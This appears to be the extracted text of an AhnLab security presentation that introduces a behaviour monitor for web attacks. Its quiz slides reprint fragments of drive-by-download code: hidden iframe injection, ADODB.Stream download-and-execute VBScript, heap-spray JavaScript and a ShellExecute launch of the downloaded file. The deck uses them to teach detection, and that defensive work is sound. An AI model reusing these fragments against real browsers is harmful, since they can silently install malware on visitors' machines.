10/2/12
www.ahnlab.com
www.ahnlab.com
10/2/12
www.ahnlab.com
400,000
http://stopbadware.org
10/2/12
www.ahnlab.com
10/2/12
www.ahnlab.com
10/2/12
www.ahnlab.com
10/2/12
www.ahnlab.com
www.ahnlab.com
Question 1.
Which tag was created dynamically?
<html>
<script>
document.write('<iframe height=0 width=0 src=iframe.html"></iframe>');
</script>
<iframe src="http://home.ahnlab.com"></iframe>
</html>
10/2/12
www.ahnlab.com
Questions 2.
Which objects were created dynamically?
set df = document.createElement("object")
df.setAttribute "classid", "clsid"+":BD96C556-65A3-11D0-983A00C04FC29E36
str1 ="Microsoft.XMLHTTP
set x = df.CreateObject(str1,"")
str2 = Adodb.stream
set S = df.createobject(str2,"")
S.type = 1
10/2/12
www.ahnlab.com
Question 3.
Hows the memory behavior?
var
slackspace=headersize+ytshell.length;while(omybro.length<slackspace)omy
bro+=omybro;bZmybr=omybro.substring(0,slackspace);woaixiaoyu=omybro.
substring(0,omybro.lengthslackspace);while(woaixiaoyu.length+slackspace<0x30000)woaixiaoyu=woai
xiaoyu+woaixiaoyu+bZmybr;memory=new Array();
10/2/12
?
?
www.ahnlab.com
Question 4.
Who is the criminal?
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"test","","open",0
?
?
10/2/12
www.ahnlab.com
WebStalker!
10/2/12
www.ahnlab.com
10/2/12
www.ahnlab.com
Answer 1.
Which tag was created dynamically?
<html>
<script>
document.write('<iframe height=0 width=0 src=iframe.html"></iframe>');
</script>
<iframe src="http://home.ahnlab.com"></iframe>
</html>
10/2/12
www.ahnlab.com
Answer 2.
Which objects were created dynamically?
set df = document.createElement("object")
df.setAttribute "classid", "clsid"+":BD96C556-65A3-11D0-983A00C04FC29E36
str1 ="Microsoft.XMLHTTP
set x = df.CreateObject(str1,"")
str2 = Adodb.stream
set S = df.createobject(str2,"")
S.type = 1
10/2/12
www.ahnlab.com
Answer 3.
Hows the memory behavior?
var
slackspace=headersize+ytshell.length;while(omybro.length<slackspace)omy
bro+=omybro;bZmybr=omybro.substring(0,slackspace);woaixiaoyu=omybro.
substring(0,omybro.lengthslackspace);while(woaixiaoyu.length+slackspace<0x30000)woaixiaoyu=woai
xiaoyu+woaixiaoyu+bZmybr;memory=new Array();
10/2/12
www.ahnlab.com
Answer 4.
Who is the criminal?
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"test","","open",0
10/2/12
www.ahnlab.com
How does
WebStalker
work?
10/2/12
www.ahnlab.com
WebStalker
PET Behavior
Monitor
10/2/12
www.ahnlab.com
Document
(http://www.foo.c
om)
script
ifram
e
Document
(http://www.bar.
com)
10/2/12
www.ahnlab.com
Document
<script>
document.write('<iframe height=0 width=0
src=http://www.bar.com"></iframe>');
</script>
CreateMarkup()
10/2/12
www.ahnlab.com
Document
(http://www.foo.com)
<script>
document.write('<iframe height=0 width=0
src=http://www.bar.com"></iframe>');
</script>
CHTMLoad::Init()
10/2/12
www.ahnlab.com
Document
(http://www.foo.com)
<script>
document.write('<iframe height=0 width=0
src=http://www.bar.com"></iframe>');
</script>
script
CreateElement()
10/2/12
www.ahnlab.com
Document
(http://www.foo.com)
<script>
document.write('<iframe height=0 width=0
src=http://www.bar.com"></iframe>');
</script>
script
Context
stack
Script
context
CHtmScriptParseCtx()
10/2/12
www.ahnlab.com
Document
(http://www.foo.com)
<script>
document.write('<iframe
width=0
src=http://www.bar.com"></iframe>');
</script>
script
iframe
Context
stack
iframe
context
script
context
CHtmIframeParseCtx()
10/2/12
height=0
www.ahnlab.com
Document
(http://www.foo.c
om)
<script>
document.write('<iframe height=0 width=0
src=http://www.bar.com"></iframe
>');
</script>
script
ifram
e
Document
(http://www.bar.
com)
10/2/12
www.ahnlab.com
WebStalker
10/2/12
www.ahnlab.com